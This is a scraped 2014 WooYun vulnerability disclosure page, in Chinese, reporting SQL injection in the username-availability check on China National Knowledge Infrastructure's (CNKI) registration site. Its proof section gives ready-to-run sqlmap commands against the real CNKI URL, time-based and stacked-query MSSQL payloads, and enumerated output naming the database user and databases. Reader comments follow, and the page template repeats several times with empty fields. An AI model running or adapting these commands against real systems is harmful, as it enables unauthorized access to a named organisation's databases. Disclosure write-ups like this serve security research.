中国知网主站存在SQL注射漏洞 | wooyun-2014-060198| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-060198

漏洞标题：中国知网主站存在SQL注射漏洞

漏洞作者：超威蓝猫

提交时间：2014-05-10 22:02

修复时间：2014-06-24 22:03

公开时间：2014-06-24 22:03

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2014-05-10：积极联系厂商并且等待厂商认领中，细节不对外公开
2014-06-24：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

中国知网主站SQL注射

详细说明：

http://www.cnki.com.cn/
http://www.cnki.net/

这两个站点的"登录"与"注册"都为相同的页面，所以可以判定为主站数据库。
检测用户名是否可用的这条HTTP请求的username参数存在SQL注射。

漏洞证明：

sqlmap.py -u "http://my.cnki.net/elibregister/CheckInfoUnitName.aspx?username=crtest&temp=1399707691804" --dbs --current-user --current-db

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: username
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: username=crtest'; WAITFOR DELAY '0:0:5'--&temp=1399707691804
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: username=crtest' WAITFOR DELAY '0:0:5'--&temp=1399707691804
---
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
current user:    'loginuser'
current database:    'CNKILoginDB'
available databases [5]:
[*] CNKILoginDB
[*] master
[*] model
[*] msdb
[*] tempdb

sqlmap.py -u "http://my.cnki.net/elibregister/CheckInfoUnitName.aspx?username=crtest&temp=1399707691804" --tables -D CNKILoginDB

time-based跑表很慢，这里只读了几个做证明

修复方案：

版权声明：转载请注明来源超威蓝猫@乌云

漏洞回应

厂商回应：

未能联系到厂商或者厂商积极拒绝

漏洞评价：

2014-05-11 01:19 | Ares ( 路人 | Rank:29 漏洞数:8 | 来自幼儿园大班)

火钳流明。mark看看。。@超威蓝猫希望细节。
2014-06-10 17:27 | 止刃 ( 路人 | Rank:16 漏洞数:2 | www.qiuzhufu.com ฏ๎๎๎๎๎๎๎๎๎...)

1个月了。
2014-06-24 22:39 | reality0ne ( 路人 | Rank:18 漏洞数:7 )

这。。。。知网。。。联系不到。。
2014-06-25 00:56 | Enjoy_Hacking ( 实习白帽子 | Rank:84 漏洞数:8 | 时间无言，如此这般。)

知网。。。你的裤子还好吗？
2014-08-12 17:16 | 狮子找女友 ( 路人 | Rank:0 漏洞数:1 | life in security)

404 error

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-060198

漏洞标题：中国知网主站存在SQL注射漏洞

相关厂商：中国知网

漏洞作者：超威蓝猫

提交时间：2014-05-10 22:02

修复时间：2014-06-24 22:03

公开时间：2014-06-24 22:03

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源超威蓝猫@乌云

漏洞回应

厂商回应：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-060198

漏洞标题：中国知网主站存在SQL注射漏洞

相关厂商：中国知网

漏洞作者： 超威蓝猫

提交时间：2014-05-10 22:02

修复时间：2014-06-24 22:03

公开时间：2014-06-24 22:03

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：未联系到厂商或者厂商积极忽略

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2014-060198"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 超威蓝猫@乌云

漏洞回应

厂商回应：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

漏洞作者：超威蓝猫

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源超威蓝猫@乌云